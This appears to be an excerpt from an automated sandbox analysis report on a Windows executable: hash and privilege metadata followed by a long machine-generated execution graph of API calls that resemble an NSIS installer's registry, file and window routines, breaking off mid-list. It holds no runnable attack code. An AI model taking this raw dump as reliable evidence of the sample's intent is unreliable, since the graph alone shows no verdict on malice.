                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:13.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:21.4%
                    Total number of Nodes:1325
                    Total number of Limit Nodes:22
                    execution_graph 3681 4025c1 3682 40154d 19 API calls 3681->3682 3683 4025cb 3682->3683 3684 40145c 18 API calls 3683->3684 3685 4025d5 3684->3685 3686 401721 3685->3686 3687 4025e2 RegQueryValueExW 3685->3687 3688 402603 3687->3688 3691 402609 3687->3691 3688->3691 3692 4059ff wsprintfW 3688->3692 3690 4025b6 RegCloseKey 3690->3686 3691->3686 3691->3690 3692->3691 3095 4018c3 3101 40145c 3095->3101 3099 4018d2 3100 40592d 2 API calls 3099->3100 3100->3099 3102 401462 3101->3102 3111 4060ca 3102->3111 3105 401493 3107 40592d 3105->3107 3108 40593a GetTickCount GetTempFileNameW 3107->3108 3109 405970 3108->3109 3110 405974 3108->3110 3109->3108 3109->3110 3110->3099 3114 4060d7 3111->3114 3112 406341 3113 401487 3112->3113 3146 405ab8 lstrcpynW 3112->3146 3113->3105 3130 405ae7 3113->3130 3114->3112 3116 406198 GetVersion 3114->3116 3117 40630b lstrlenW 3114->3117 3120 4060ca 10 API calls 3114->3120 3124 405ae7 5 API calls 3114->3124 3144 4059ff wsprintfW 3114->3144 3145 405ab8 lstrcpynW 3114->3145 3125 4061a5 3116->3125 3117->3114 3120->3117 3121 406217 GetSystemDirectoryW 3121->3125 3123 40622a GetWindowsDirectoryW 3123->3125 3124->3114 3125->3114 3125->3121 3125->3123 3126 4060ca 10 API calls 3125->3126 3127 4062a4 lstrcatW 3125->3127 3128 40625e SHGetSpecialFolderLocation 3125->3128 3139 405981 RegOpenKeyExW 3125->3139 3126->3125 3127->3114 3128->3125 3129 406276 SHGetPathFromIDListW CoTaskMemFree 3128->3129 3129->3125 3137 405af4 3130->3137 3131 405b70 CharPrevW 3134 405b6a 3131->3134 3132 405b5d CharNextW 3132->3134 3132->3137 3134->3131 3135 405b92 3134->3135 3135->3105 3136 405b49 CharNextW 3136->3137 3137->3132 3137->3134 3137->3136 3138 405b58 CharNextW 3137->3138 3147 4057b3 3137->3147 3138->3132 3140 4059b5 RegQueryValueExW 3139->3140 3141 4059fa 3139->3141 3142 4059d7 RegCloseKey 3140->3142 3141->3125 3142->3141 3144->3114 3145->3114 3146->3113 3148 4057b9 3147->3148 3149 4057cf 3148->3149 3150 4057c0 CharNextW 3148->3150 3149->3137 3150->3148 3693 402c43 3694 40145c 18 API calls 3693->3694 3695 402c4b 3694->3695 3700 405c70 GlobalAlloc lstrlenW 3695->3700 3697 402c51 3727 4059ff wsprintfW 3697->3727 3699 402c58 3701 405ca6 3700->3701 3702 405cf8 3700->3702 3703 405cd3 GetVersionExW 3701->3703 3728 405ada CharUpperW 3701->3728 3702->3697 3703->3702 3704 405d02 3703->3704 3706 405d11 3704->3706 3707 405d28 LoadLibraryA 3704->3707 3706->3702 3708 405e49 GlobalFree 3706->3708 3707->3702 3709 405d46 GetProcAddress GetProcAddress GetProcAddress 3707->3709 3710 405fa1 FreeLibrary 3708->3710 3711 405e5f LoadLibraryA 3708->3711 3715 405d6e 3709->3715 3722 405eb9 3709->3722 3710->3702 3711->3702 3712 405e79 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3711->3712 3712->3722 3713 405f15 FreeLibrary 3714 405eee 3713->3714 3717 405fae 3714->3717 3724 405f49 lstrcmpW 3714->3724 3725 405f7a CloseHandle 3714->3725 3726 405f98 CloseHandle 3714->3726 3716 405d92 FreeLibrary GlobalFree 3715->3716 3721 405dae 3715->3721 3715->3722 3716->3702 3719 405fb3 CloseHandle FreeLibrary 3717->3719 3718 405dc0 lstrcpyW OpenProcess 3720 405e13 CloseHandle CharUpperW lstrcmpW 3718->3720 3718->3721 3723 405fc8 CloseHandle 3719->3723 3720->3721 3720->3722 3721->3708 3721->3718 3721->3720 3722->3713 3722->3714 3723->3719 3724->3714 3724->3723 3725->3714 3726->3710 3727->3699 3728->3701 3729 404f45 3730 405099 3729->3730 3731 404f5d 3729->3731 3733 4050ea 3730->3733 3734 4050aa GetDlgItem GetDlgItem 3730->3734 3731->3730 3732 404f69 3731->3732 3736 404f74 SetWindowPos 3732->3736 3737 404f87 3732->3737 3735 405144 3733->3735 3746 40139b 2 API calls 3733->3746 3814 4038c7 3734->3814 3740 403937 SendMessageW 3735->3740 3760 405094 3735->3760 3736->3737 3741 404fa4 3737->3741 3742 404f8c ShowWindow 3737->3742 3739 4050d4 SetClassLongW 3743 40141d 2 API calls 3739->3743 3765 405156 3740->3765 3744 404fc6 3741->3744 3745 404fac DestroyWindow 3741->3745 3742->3741 3743->3733 3747 404fcb SetWindowLongW 3744->3747 3748 404fdc 3744->3748 3796 4053a8 3745->3796 3749 40511c 3746->3749 3747->3760 3751 405053 3748->3751 3752 404fe8 GetDlgItem 3748->3752 3749->3735 3753 405120 SendMessageW 3749->3753 3750 4053aa DestroyWindow EndDialog 3750->3796 3800 403952 3751->3800 3755 405018 3752->3755 3756 404ffb SendMessageW IsWindowEnabled 3752->3756 3753->3760 3754 40141d 2 API calls 3754->3765 3761 405025 3755->3761 3763 40506c SendMessageW 3755->3763 3764 405038 3755->3764 3771 40501d 3755->3771 3756->3755 3756->3760 3758 4053d9 ShowWindow 3758->3760 3759 4060ca 18 API calls 3759->3765 3761->3763 3761->3771 3763->3751 3766 405040 3764->3766 3767 405055 3764->3767 3765->3750 3765->3754 3765->3759 3765->3760 3768 4038c7 19 API calls 3765->3768 3772 4038c7 19 API calls 3765->3772 3787 4052ea DestroyWindow 3765->3787 3770 40141d 2 API calls 3766->3770 3769 40141d 2 API calls 3767->3769 3768->3765 3769->3771 3770->3771 3771->3751 3797 4038a0 3771->3797 3773 4051d1 GetDlgItem 3772->3773 3774 4051e6 3773->3774 3775 4051ef ShowWindow EnableWindow 3773->3775 3774->3775 3817 40390d EnableWindow 3775->3817 3777 405219 EnableWindow 3780 40522d 3777->3780 3778 405232 GetSystemMenu EnableMenuItem SendMessageW 3779 405262 SendMessageW 3778->3779 3778->3780 3779->3780 3780->3778 3818 403920 SendMessageW 3780->3818 3819 405ab8 lstrcpynW 3780->3819 3783 405290 lstrlenW 3784 4060ca 18 API calls 3783->3784 3785 4052a6 SetWindowTextW 3784->3785 3786 40139b 2 API calls 3785->3786 3786->3765 3788 405304 CreateDialogParamW 3787->3788 3787->3796 3789 405337 3788->3789 3788->3796 3790 4038c7 19 API calls 3789->3790 3791 405342 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3790->3791 3792 40139b 2 API calls 3791->3792 3793 405388 3792->3793 3793->3760 3794 405390 ShowWindow 3793->3794 3795 403937 SendMessageW 3794->3795 3795->3796 3796->3758 3796->3760 3798 4038a7 3797->3798 3799 4038ad SendMessageW 3797->3799 3798->3799 3799->3751 3801 4039f0 3800->3801 3802 403967 GetWindowLongW 3800->3802 3801->3760 3802->3801 3803 403978 3802->3803 3804 403987 GetSysColor 3803->3804 3805 40398a 3803->3805 3804->3805 3806 403990 SetTextColor 3805->3806 3807 40399a SetBkMode 3805->3807 3806->3807 3808 4039b2 GetSysColor 3807->3808 3809 4039b8 3807->3809 3808->3809 3810 4039c9 3809->3810 3811 4039bf SetBkColor 3809->3811 3810->3801 3812 4039e3 CreateBrushIndirect 3810->3812 3813 4039dc DeleteObject 3810->3813 3811->3810 3812->3801 3813->3812 3815 4060ca 18 API calls 3814->3815 3816 4038d2 SetDlgItemTextW 3815->3816 3816->3739 3817->3777 3818->3780 3819->3783 3820 402145 3821 402158 3820->3821 3825 40220a 3820->3825 3822 40145c 18 API calls 3821->3822 3823 402160 3822->3823 3824 40145c 18 API calls 3823->3824 3826 40216a 3824->3826 3827 402181 LoadLibraryExW 3826->3827 3828 402174 GetModuleHandleW 3826->3828 3827->3825 3829 402191 3827->3829 3828->3827 3828->3829 3838 405c29 GlobalAlloc WideCharToMultiByte 3829->3838 3831 40219a 3832 4021a0 3831->3832 3833 4021dd 3831->3833 3835 401435 25 API calls 3832->3835 3836 4021b0 3832->3836 3834 404a73 25 API calls 3833->3834 3834->3836 3835->3836 3836->3825 3837 4021fe FreeLibrary 3836->3837 3837->3825 3839 405c61 GlobalFree 3838->3839 3840 405c54 GetProcAddress 3838->3840 3839->3831 3840->3839 3542 401646 3547 401446 3542->3547 3544 40164d Sleep 3546 402c58 3544->3546 3548 4060ca 18 API calls 3547->3548 3549 401455 3548->3549 3549->3544 3841 401e46 3842 401446 18 API calls 3841->3842 3843 401e4d IsWindow 3842->3843 3844 401ac7 3845 401a8b 3844->3845 3846 401a7d 3844->3846 3847 40145c 18 API calls 3846->3847 3848 401a82 3847->3848 3849 406559 72 API calls 3848->3849 3849->3845 3850 402648 3851 40154d 19 API calls 3850->3851 3852 402652 3851->3852 3853 401446 18 API calls 3852->3853 3854 40265c 3853->3854 3855 402684 RegEnumValueW 3854->3855 3856 402678 RegEnumKeyW 3854->3856 3858 401721 3854->3858 3857 40269d 3855->3857 3855->3858 3856->3857 3857->3858 3859 4025b6 RegCloseKey 3857->3859 3859->3858 3860 4026c8 3861 40145c 18 API calls 3860->3861 3862 4026d0 3861->3862 3867 4058fe GetFileAttributesW CreateFileW 3862->3867 3864 4026dc 3868 4059ff wsprintfW 3864->3868 3866 402c58 3867->3864 3868->3866 3591 401cc9 3592 401d26 3591->3592 3593 401cd6 3591->3593 3594 401d49 GlobalAlloc 3592->3594 3595 401d2a 3592->3595 3597 4060ca 18 API calls 3593->3597 3599 401cf3 3593->3599 3596 4060ca 18 API calls 3594->3596 3603 401721 3595->3603 3610 405ab8 lstrcpynW 3595->3610 3596->3603 3597->3599 3608 405ab8 lstrcpynW 3599->3608 3601 401d3c GlobalFree 3601->3603 3602 401d08 3609 405ab8 lstrcpynW 3602->3609 3606 401d17 3611 405ab8 lstrcpynW 3606->3611 3608->3602 3609->3606 3610->3601 3611->3603 3869 403ec9 3870 403f02 3869->3870 3871 403ed9 3869->3871 3873 403952 8 API calls 3870->3873 3872 4038c7 19 API calls 3871->3872 3874 403ee6 SetDlgItemTextW 3872->3874 3875 403f0e 3873->3875 3874->3870 3876 403acb 3877 403af7 3876->3877 3878 403adb 3876->3878 3880 403b2a 3877->3880 3881 403afd SHGetPathFromIDListW 3877->3881 3887 405731 GetDlgItemTextW 3878->3887 3882 403b14 SendMessageW 3881->3882 3883 403b0d 3881->3883 3882->3880 3885 40141d 2 API calls 3883->3885 3884 403ae8 SendMessageW 3884->3877 3885->3882 3887->3884 3888 4029cb 3889 4029d3 3888->3889 3891 4018b2 3888->3891 3890 4029e0 FindNextFileW 3889->3890 3890->3891 3892 4029ef 3890->3892 3894 405ab8 lstrcpynW 3892->3894 3894->3891 3895 401acc 3896 40145c 18 API calls 3895->3896 3897 401ad4 lstrlenW 3896->3897 3898 402c51 3897->3898 3901 4059ff wsprintfW 3898->3901 3900 402c58 3901->3900 3902 4043cd 3903 4043f2 3902->3903 3904 4043db 3902->3904 3906 404400 IsWindowVisible 3903->3906 3912 404417 3903->3912 3905 4043e1 3904->3905 3920 40445b 3904->3920 3907 403937 SendMessageW 3905->3907 3909 40440d 3906->3909 3906->3920 3910 4043eb 3907->3910 3908 404461 CallWindowProcW 3908->3910 3921 40434f SendMessageW 3909->3921 3912->3908 3926 405ab8 lstrcpynW 3912->3926 3914 404446 3927 4059ff wsprintfW 3914->3927 3916 40444d 3917 40141d 2 API calls 3916->3917 3918 404454 3917->3918 3928 405ab8 lstrcpynW 3918->3928 3920->3908 3922 404372 GetMessagePos ScreenToClient SendMessageW 3921->3922 3923 4043ac SendMessageW 3921->3923 3924 4043a4 3922->3924 3925 4043a9 3922->3925 3923->3924 3924->3912 3925->3923 3926->3914 3927->3916 3928->3920 3929 4016ce 3930 4016d7 3929->3930 3932 4016ec 3929->3932 3931 4016e9 ShowWindow 3930->3931 3930->3932 3931->3932 3933 402350 3934 40145c 18 API calls 3933->3934 3935 402357 3934->3935 3936 40145c 18 API calls 3935->3936 3937 402361 3936->3937 3938 40145c 18 API calls 3937->3938 3939 40236b 3938->3939 3940 405b98 2 API calls 3939->3940 3941 402373 3940->3941 3942 402385 lstrlenW lstrlenW 3941->3942 3944 404a73 25 API calls 3941->3944 3946 402c58 3941->3946 3943 404a73 25 API calls 3942->3943 3945 4023c4 SHFileOperationW 3943->3945 3944->3941 3945->3941 3945->3946 3947 4017d3 3948 40145c 18 API calls 3947->3948 3949 4017db 3948->3949 3950 40145c 18 API calls 3949->3950 3951 4017e5 3950->3951 3952 40145c 18 API calls 3951->3952 3953 4017ef MoveFileW 3952->3953 3954 4017ac 3953->3954 3955 4017ff 3953->3955 3957 401435 25 API calls 3954->3957 3959 401721 3954->3959 3956 405b98 2 API calls 3955->3956 3955->3959 3958 40180f 3956->3958 3957->3959 3958->3959 3960 406526 42 API calls 3958->3960 3960->3954 3550 4018d7 3551 40145c 18 API calls 3550->3551 3552 4018df 3551->3552 3553 401905 3552->3553 3554 4018fd 3552->3554 3590 405ab8 lstrcpynW 3553->3590 3589 405ab8 lstrcpynW 3554->3589 3557 401903 3561 405ae7 5 API calls 3557->3561 3558 401910 3559 405fe6 3 API calls 3558->3559 3560 401916 lstrcatW 3559->3560 3560->3557 3571 401922 3561->3571 3562 405b98 2 API calls 3562->3571 3563 4058de 2 API calls 3563->3571 3565 40193e CompareFileTime 3565->3571 3566 4019f8 3567 404a73 25 API calls 3566->3567 3570 401a02 3567->3570 3568 404a73 25 API calls 3587 4019e4 3568->3587 3569 405ab8 lstrcpynW 3569->3571 3572 402ee7 33 API calls 3570->3572 3571->3562 3571->3563 3571->3565 3571->3566 3571->3569 3576 4060ca 18 API calls 3571->3576 3584 40574d MessageBoxIndirectW 3571->3584 3586 4019cf 3571->3586 3588 4058fe GetFileAttributesW CreateFileW 3571->3588 3573 401a17 3572->3573 3574 401a2b SetFileTime 3573->3574 3575 401a3a CloseHandle 3573->3575 3574->3575 3577 401a4b 3575->3577 3575->3587 3576->3571 3578 401a50 3577->3578 3579 401a63 3577->3579 3580 4060ca 18 API calls 3578->3580 3581 4060ca 18 API calls 3579->3581 3582 401a58 lstrcatW 3580->3582 3583 401a6b 3581->3583 3582->3583 3585 40574d MessageBoxIndirectW 3583->3585 3584->3571 3585->3587 3586->3568 3586->3587 3588->3571 3589->3557 3590->3558 3961 4023d8 3962 401ce5 3961->3962 3965 4023e3 3961->3965 3963 4060ca 18 API calls 3962->3963 3964 401cf3 3963->3964 3971 405ab8 lstrcpynW 3964->3971 3967 401d08 3972 405ab8 lstrcpynW 3967->3972 3969 401d17 3973 405ab8 lstrcpynW 3969->3973 3971->3967 3972->3969 3973->3965 3974 401e59 3975 401446 18 API calls 3974->3975 3976 401e61 3975->3976 3977 401446 18 API calls 3976->3977 3978 401e6a GetDlgItem 3977->3978 3979 402c51 3978->3979 3982 4059ff wsprintfW 3979->3982 3981 402c58 3982->3981 3983 40285a 3984 402860 3983->3984 3985 402873 3983->3985 3986 401446 18 API calls 3984->3986 3987 40145c 18 API calls 3985->3987 3990 402868 3986->3990 3988 40287b lstrlenW 3987->3988 3988->3990 3989 401721 3990->3989 3991 40289f WriteFile 3990->3991 3991->3989 3992 40385e 3993 403869 3992->3993 3994 403870 GlobalAlloc 3993->3994 3995 40386d 3993->3995 3994->3995 3996 403bde 3997 403be8 3996->3997 3998 403beb lstrcpynW lstrlenW 3996->3998 3997->3998 3999 401adf 4000 401446 18 API calls 3999->4000 4001 401ae7 4000->4001 4002 401446 18 API calls 4001->4002 4003 401af2 4002->4003 4004 40145c 18 API calls 4003->4004 4005 401afc 4004->4005 4006 401b11 lstrlenW 4005->4006 4011 401b4a 4005->4011 4007 401b1b 4006->4007 4007->4011 4012 405ab8 lstrcpynW 4007->4012 4009 401b33 4010 401b40 lstrlenW 4009->4010 4009->4011 4010->4011 4012->4009 4013 401661 SetForegroundWindow 4014 402c58 4013->4014 4015 401be3 4016 401446 18 API calls 4015->4016 4017 401bea 4016->4017 4018 401446 18 API calls 4017->4018 4019 401aae 4018->4019 4020 401b68 4021 40145c 18 API calls 4020->4021 4022 401b70 4021->4022 4023 40145c 18 API calls 4022->4023 4024 401b7a 4023->4024 4025 401b82 lstrcmpiW 4024->4025 4026 401b98 lstrcmpW 4024->4026 4027 401aae 4025->4027 4026->4027 4028 401f6c 4029 401446 18 API calls 4028->4029 4030 401f73 4029->4030 4031 401446 18 API calls 4030->4031 4032 401f7d 4031->4032 4033 401f90 EnableWindow 4032->4033 4034 401f85 ShowWindow 4032->4034 4035 402c58 4033->4035 4034->4035 4036 4023ee 4037 4023f9 4036->4037 4040 402400 4036->4040 4038 40145c 18 API calls 4037->4038 4038->4040 4039 402411 4041 402421 4039->4041 4043 40145c 18 API calls 4039->4043 4040->4039 4042 40145c 18 API calls 4040->4042 4044 40145c 18 API calls 4041->4044 4042->4039 4043->4041 4045 40242b WritePrivateProfileStringW 4044->4045 4046 40166f 4047 401678 4046->4047 4049 40168c 4046->4049 4048 401446 18 API calls 4047->4048 4048->4049 4050 40276f 4051 401446 18 API calls 4050->4051 4053 402779 4051->4053 4052 4027b0 ReadFile 4052->4053 4059 402811 4052->4059 4053->4052 4054 402813 4053->4054 4055 4027da MultiByteToWideChar 4053->4055 4056 402823 4053->4056 4053->4059 4060 4059ff wsprintfW 4054->4060 4055->4053 4055->4056 4058 40283f SetFilePointer 4056->4058 4056->4059 4058->4059 4060->4059 4061 4026ef GlobalAlloc 4062 402717 4061->4062 4063 402708 4061->4063 4065 40145c 18 API calls 4062->4065 4064 401446 18 API calls 4063->4064 4068 402710 4064->4068 4066 40271f WideCharToMultiByte lstrlenA 4065->4066 4066->4068 4067 402760 4068->4067 4069 402755 WriteFile 4068->4069 4069->4067 4070 401ef0 GetDC GetDeviceCaps 4071 401446 18 API calls 4070->4071 4072 401f0d MulDiv 4071->4072 4073 401446 18 API calls 4072->4073 4074 401f23 4073->4074 4075 4060ca 18 API calls 4074->4075 4076 401f5c CreateFontIndirectW 4075->4076 4077 402c51 4076->4077 4080 4059ff wsprintfW 4077->4080 4079 402c58 4080->4079 4081 4029f1 4082 40145c 18 API calls 4081->4082 4083 4029f9 FindFirstFileW 4082->4083 4084 402a0c 4083->4084 4086 402a1d 4084->4086 4089 4059ff wsprintfW 4084->4089 4090 405ab8 lstrcpynW 4086->4090 4088 402a2a 4089->4086 4090->4088 4091 403b74 4092 403bd1 4091->4092 4093 403b81 lstrcpynA lstrlenA 4091->4093 4093->4092 4094 403bb2 4093->4094 4094->4092 4095 403bbe GlobalFree 4094->4095 4095->4092 4096 401d76 4097 401446 18 API calls 4096->4097 4098 401d7e 4097->4098 4099 401446 18 API calls 4098->4099 4100 401d89 4099->4100 4101 401d9a 4100->4101 4102 40145c 18 API calls 4100->4102 4103 401dab 4101->4103 4104 40145c 18 API calls 4101->4104 4102->4101 4105 401db4 4103->4105 4106 401dff 4103->4106 4104->4103 4108 401446 18 API calls 4105->4108 4107 40145c 18 API calls 4106->4107 4109 401e07 4107->4109 4110 401dbc 4108->4110 4111 40145c 18 API calls 4109->4111 4112 401446 18 API calls 4110->4112 4113 401e11 FindWindowExW 4111->4113 4114 401dc6 4112->4114 4118 401e31 4113->4118 4115 401dd0 SendMessageTimeoutW 4114->4115 4116 401def SendMessageW 4114->4116 4115->4118 4116->4118 4117 402c58 4118->4117 4120 4059ff wsprintfW 4118->4120 4120->4117 4121 401e76 4122 401446 18 API calls 4121->4122 4123 401e87 SetWindowLongW 4122->4123 4124 402c58 4123->4124 4125 4024f8 4126 4024fc 4125->4126 4127 40145c 18 API calls 4126->4127 4128 40251d 4127->4128 4129 40145c 18 API calls 4128->4129 4130 402528 RegCreateKeyExW 4129->4130 4131 402554 4130->4131 4132 402c58 4130->4132 4133 402570 4131->4133 4134 40145c 18 API calls 4131->4134 4135 40257d 4133->4135 4137 401446 18 API calls 4133->4137 4136 402566 lstrlenW 4134->4136 4138 402599 RegSetValueExW 4135->4138 4139 402ee7 33 API calls 4135->4139 4136->4133 4137->4135 4140 4025b0 RegCloseKey 4138->4140 4139->4138 4140->4132 4142 402979 4143 40296c 4142->4143 4143->4142 4144 401446 18 API calls 4143->4144 4145 40298e 4144->4145 4146 402995 SetFilePointer 4145->4146 4147 4029a6 4146->4147 4148 402c58 4146->4148 4150 4059ff wsprintfW 4147->4150 4150->4148 4151 401a7b 4152 401a7d 4151->4152 4153 40145c 18 API calls 4152->4153 4154 401a82 4153->4154 4155 406559 72 API calls 4154->4155 4156 401a8b 4155->4156 4157 40447d GetDlgItem GetDlgItem 4158 4044d3 7 API calls 4157->4158 4163 4046eb 4157->4163 4159 404577 DeleteObject 4158->4159 4160 40456b SendMessageW 4158->4160 4161 404582 4159->4161 4160->4159 4164 4045b9 4161->4164 4166 4060ca 18 API calls 4161->4166 4162 4047d0 4165 404875 4162->4165 4175 40481f SendMessageW 4162->4175 4200 4046de 4162->4200 4163->4162 4173 40434f 5 API calls 4163->4173 4187 40475b 4163->4187 4169 4038c7 19 API calls 4164->4169 4167 40488a 4165->4167 4168 40487e SendMessageW 4165->4168 4171 40459b SendMessageW SendMessageW 4166->4171 4178 4048a3 4167->4178 4179 40489c ImageList_Destroy 4167->4179 4185 4048b3 4167->4185 4168->4167 4174 4045cd 4169->4174 4170 403952 8 API calls 4177 404a6c 4170->4177 4171->4161 4172 4047c2 SendMessageW 4172->4162 4173->4187 4180 4038c7 19 API calls 4174->4180 4176 404834 SendMessageW 4175->4176 4175->4200 4182 404847 4176->4182 4183 4048ac GlobalFree 4178->4183 4178->4185 4179->4178 4184 4045de 4180->4184 4181 404a1d 4186 404a32 ShowWindow GetDlgItem ShowWindow 4181->4186 4181->4200 4191 404858 SendMessageW 4182->4191 4183->4185 4188 4046ab GetWindowLongW SetWindowLongW 4184->4188 4194 40463a SendMessageW 4184->4194 4195 4046a5 4184->4195 4198 404668 SendMessageW 4184->4198 4199 40467c SendMessageW 4184->4199 4185->4181 4190 40141d 2 API calls 4185->4190 4202 4048e5 4185->4202 4186->4200 4187->4162 4187->4172 4189 4046c5 4188->4189 4192 4046e3 4189->4192 4193 4046cb ShowWindow 4189->4193 4190->4202 4191->4165 4209 403920 SendMessageW 4192->4209 4208 403920 SendMessageW 4193->4208 4194->4184 4195->4188 4195->4189 4198->4184 4199->4184 4200->4170 4201 4049f4 InvalidateRect 4201->4181 4203 404a0a 4201->4203 4204 404913 SendMessageW 4202->4204 4205 404929 4202->4205 4210 403f13 4203->4210 4204->4205 4205->4201 4207 4049a2 SendMessageW SendMessageW 4205->4207 4207->4205 4208->4200 4209->4163 4211 403f33 4210->4211 4212 4060ca 18 API calls 4211->4212 4213 403f73 4212->4213 4214 4060ca 18 API calls 4213->4214 4215 403f7e 4214->4215 4216 4060ca 18 API calls 4215->4216 4217 403f8e lstrlenW wsprintfW SetDlgItemTextW 4216->4217 4217->4181 4218 40207d 4219 40145c 18 API calls 4218->4219 4220 402085 4219->4220 4221 405b98 2 API calls 4220->4221 4222 40208b 4221->4222 4223 40209a 4222->4223 4227 4059ff wsprintfW 4222->4227 4228 4059ff wsprintfW 4223->4228 4226 402c58 4227->4223 4228->4226 4229 4015fd 4230 401605 4229->4230 4231 404a73 25 API calls 4229->4231 4231->4230 4232 401ffe 4233 40145c 18 API calls 4232->4233 4234 402005 4233->4234 4235 404a73 25 API calls 4234->4235 4236 40200f 4235->4236 4237 4056ec 2 API calls 4236->4237 4238 402015 4237->4238 4239 401721 4238->4239 4240 402026 WaitForSingleObject 4238->4240 4244 402066 CloseHandle 4238->4244 4242 402038 4240->4242 4243 40204a GetExitCodeProcess 4242->4243 4246 405bf6 2 API calls 4242->4246 4243->4244 4245 40205d 4243->4245 4244->4239 4249 4059ff wsprintfW 4245->4249 4247 40203f WaitForSingleObject 4246->4247 4247->4242 4249->4244 4250 401000 4251 401037 BeginPaint GetClientRect 4250->4251 4252 40100c DefWindowProcW 4250->4252 4254 4010fc 4251->4254 4255 401182 4252->4255 4256 401073 CreateBrushIndirect FillRect DeleteObject 4254->4256 4257 401105 4254->4257 4256->4254 4258 401170 EndPaint 4257->4258 4259 40110b CreateFontIndirectW 4257->4259 4258->4255 4259->4258 4260 40111b 6 API calls 4259->4260 4260->4258 4261 401707 4262 40145c 18 API calls 4261->4262 4263 40170f SetFileAttributesW 4262->4263 4264 401721 4263->4264 4265 40400b 4266 40404c 4265->4266 4267 40403f 4265->4267 4269 404055 GetDlgItem 4266->4269 4274 4040b8 4266->4274 4326 405731 GetDlgItemTextW 4267->4326 4271 404069 4269->4271 4270 404046 4273 405ae7 5 API calls 4270->4273 4276 40407d SetWindowTextW 4271->4276 4281 405807 4 API calls 4271->4281 4272 40419f 4324 404334 4272->4324 4328 405731 GetDlgItemTextW 4272->4328 4273->4266 4274->4272 4277 4060ca 18 API calls 4274->4277 4274->4324 4279 4038c7 19 API calls 4276->4279 4283 404131 SHBrowseForFolderW 4277->4283 4278 4041cb 4284 406042 18 API calls 4278->4284 4285 40409b 4279->4285 4280 403952 8 API calls 4286 404348 4280->4286 4282 404073 4281->4282 4282->4276 4290 405fe6 3 API calls 4282->4290 4283->4272 4287 404149 CoTaskMemFree 4283->4287 4288 4041d1 4284->4288 4289 4038c7 19 API calls 4285->4289 4291 405fe6 3 API calls 4287->4291 4329 405ab8 lstrcpynW 4288->4329 4292 4040a9 4289->4292 4290->4276 4293 404156 4291->4293 4327 403920 SendMessageW 4292->4327 4296 40418d SetDlgItemTextW 4293->4296 4301 4060ca 18 API calls 4293->4301 4296->4272 4297 4040b1 4299 405bbf 3 API calls 4297->4299 4298 4041e8 4300 405bbf 3 API calls 4298->4300 4299->4274 4302 4041f0 4300->4302 4303 404175 lstrcmpiW 4301->4303 4304 404231 4302->4304 4311 406015 2 API calls 4302->4311 4313 404286 4302->4313 4303->4296 4306 404186 lstrcatW 4303->4306 4330 405ab8 lstrcpynW 4304->4330 4306->4296 4307 40423a 4308 405807 4 API calls 4307->4308 4309 404240 GetDiskFreeSpaceW 4308->4309 4312 404264 MulDiv 4309->4312 4309->4313 4311->4302 4312->4313 4314 4042e3 4313->4314 4316 403f13 21 API calls 4313->4316 4315 404306 4314->4315 4317 40141d 2 API calls 4314->4317 4331 40390d EnableWindow 4315->4331 4318 4042d4 4316->4318 4317->4315 4320 4042e5 SetDlgItemTextW 4318->4320 4321 4042d9 4318->4321 4320->4314 4323 403f13 21 API calls 4321->4323 4322 404322 4322->4324 4332 4038e9 4322->4332 4323->4314 4324->4280 4326->4270 4327->4297 4328->4278 4329->4298 4330->4307 4331->4322 4333 4038f7 4332->4333 4334 4038fc SendMessageW 4332->4334 4333->4334 4334->4324 3631 40188d 3632 40145c 18 API calls 3631->3632 3633 401895 SearchPathW 3632->3633 3634 4018b2 3633->3634 3654 40248e 3655 4024c0 3654->3655 3656 402494 3654->3656 3657 40145c 18 API calls 3655->3657 3667 40154d 3656->3667 3659 4024c8 3657->3659 3671 401497 RegOpenKeyExW 3659->3671 3660 40249b 3663 40145c 18 API calls 3660->3663 3666 401721 3660->3666 3664 4024ad RegDeleteValueW RegCloseKey 3663->3664 3664->3666 3668 40155e 3667->3668 3669 40145c 18 API calls 3668->3669 3670 401585 RegOpenKeyExW 3669->3670 3670->3660 3678 4014c3 3671->3678 3679 40150f 3671->3679 3672 4014e9 RegEnumKeyW 3673 4014fb RegCloseKey 3672->3673 3672->3678 3675 405bbf 3 API calls 3673->3675 3674 401520 RegCloseKey 3674->3679 3677 40150b 3675->3677 3676 401497 3 API calls 3676->3678 3677->3679 3680 40153b RegDeleteKeyW 3677->3680 3678->3672 3678->3673 3678->3674 3678->3676 3679->3666 3680->3679 4335 401610 4336 40161b PostQuitMessage 4335->4336 4337 401605 4335->4337 4336->4337 4338 401a90 4339 40145c 18 API calls 4338->4339 4340 401a98 4339->4340 4341 40574d MessageBoxIndirectW 4340->4341 4342 401721 4341->4342 3151 403415 #17 SetErrorMode OleInitialize 3223 405bbf GetModuleHandleA 3151->3223 3155 403483 GetCommandLineW 3228 405ab8 lstrcpynW 3155->3228 3157 403495 GetModuleHandleW 3158 4034ad 3157->3158 3159 4057b3 CharNextW 3158->3159 3160 4034bc CharNextW 3159->3160 3174 4034ce 3160->3174 3161 403566 3162 403585 GetTempPathW 3161->3162 3229 403360 3162->3229 3164 40359b 3165 4035c3 DeleteFileW 3164->3165 3166 40359f GetWindowsDirectoryW lstrcatW 3164->3166 3237 40311b GetTickCount GetModuleFileNameW 3165->3237 3168 403360 11 API calls 3166->3168 3167 4057b3 CharNextW 3167->3174 3170 4035bb 3168->3170 3170->3165 3172 403650 3170->3172 3171 4035d7 3171->3172 3175 4057b3 CharNextW 3171->3175 3208 403640 3171->3208 3320 4033eb 3172->3320 3174->3161 3174->3167 3180 403568 3174->3180 3185 4035ee 3175->3185 3178 403756 3181 4037d9 3178->3181 3183 405bbf 3 API calls 3178->3183 3179 403669 3327 40574d 3179->3327 3331 405ab8 lstrcpynW 3180->3331 3187 403765 3183->3187 3188 403618 3185->3188 3189 40367f lstrcatW lstrcmpiW 3185->3189 3190 405bbf 3 API calls 3187->3190 3332 406042 3188->3332 3189->3172 3192 40369b CreateDirectoryW SetCurrentDirectoryW 3189->3192 3193 40376e 3190->3193 3194 4036b3 3192->3194 3195 4036be 3192->3195 3197 405bbf 3 API calls 3193->3197 3348 405ab8 lstrcpynW 3194->3348 3349 405ab8 lstrcpynW 3195->3349 3201 403777 3197->3201 3200 4036cc 3350 405ab8 lstrcpynW 3200->3350 3204 4037c5 ExitWindowsEx 3201->3204 3210 403785 